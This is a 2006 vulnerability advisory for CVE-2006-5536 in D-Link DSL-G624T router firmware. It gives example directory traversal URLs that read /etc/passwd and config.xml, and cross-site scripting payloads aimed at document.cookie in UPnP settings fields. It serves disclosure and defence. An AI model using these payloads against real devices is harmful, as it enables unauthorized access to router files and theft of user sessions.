CVE-2006-5536: D-Link DSL-G624T several vulnerabilities

Jose Ramon Palanco
by Jose Ramon Palanco October 26, 2006
advisories
#d-link #directory listing #directory transversal #xss
CVE-2006-5536: D-Link DSL-G624T several vulnerabilities

Directory traversal vulnerability in cgi-bin/webcm in D-Link DSL-G624T firmware 3.00B01T01.YA-C.20060616 allows remote attackers to read arbitrary files via a .. (dot dot) in the getpage parameter.

Researcher

José Ramón Palanco: jpalanco@gmail.com

Details

Vulnerabilities

Directory transversal

Examples:

http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd

http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml

Cross Site Scripting

Affected url: http://router/cgi-bin/webcm

MethodVariableValue
POSTupnp%3Asettings%2Fstate>”><ScRiPt%20%0a%0d>alert(document.cookie)%3B
POSTupnp%3Asettings%2Fconnection>”><ScRiPt%20%0a%0d>alert(document.cookie)%3B
POSTupnp%3Asettings%2Fconnection”+onmouseover=“alert(document.cookie)

Directory listing

Affected: /cgi-bin directory

Products and Versions

  • Vendor: D-LINK
  • Product: DSL-G624T
  • Version: V3.00B01T01.YA-C.20060616

CPE v2.3

cpe:2.3:h:d-link:dsl-g624t:firmware3.00b01t01.ya_c.2006-06-16::::::_:*

CVSS Scores & Vulnerability Types

NameValue
CVSS Score5.0
Confidentiality ImpactPartial (There is considerable informational disclosure.)
Integrity ImpactNone (There is no impact to the integrity of the system)
Availability ImpactNone (There is no impact to the availability of the system.)
Access ComplexityLow (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. )
AuthenticationNot required (Authentication is not required to exploit the vulnerability.)
Gained AccessNone
Vulnerability Type(s)Directory traversal
CWE IDCWE id is not defined for this vulnerability

References

About the Author

Jose Ramon Palanco
Jose Ramon Palanco

Jose Ramón Palanco is the CEO/CTO of Plexicus, a pioneering company in ASPM (Application Security Posture Management) launched in 2024, offering AI-powered remediation capabilities. Previously, he founded Dinoflux in 2014, a Threat Intelligence startup that was acquired by Telefonica, and has been working with 11paths since 2018. His experience includes roles at Ericsson's R&D department and Optenet (Allot). He holds a Telecommunications Engineering degree from the University of Alcala de Henares and a Master's in IT Governance from the University of Deusto. As a recognized cybersecurity expert, he has been a speaker at various prestigious conferences including OWASP, ROOTEDCON, ROOTCON, MALCON, and FAQin. His contributions to the cybersecurity field include multiple CVE publications and the development of various open source tools such as nmap-scada, ProtocolDetector, escan, pma, EKanalyzer, SCADA IDS, and more.

Share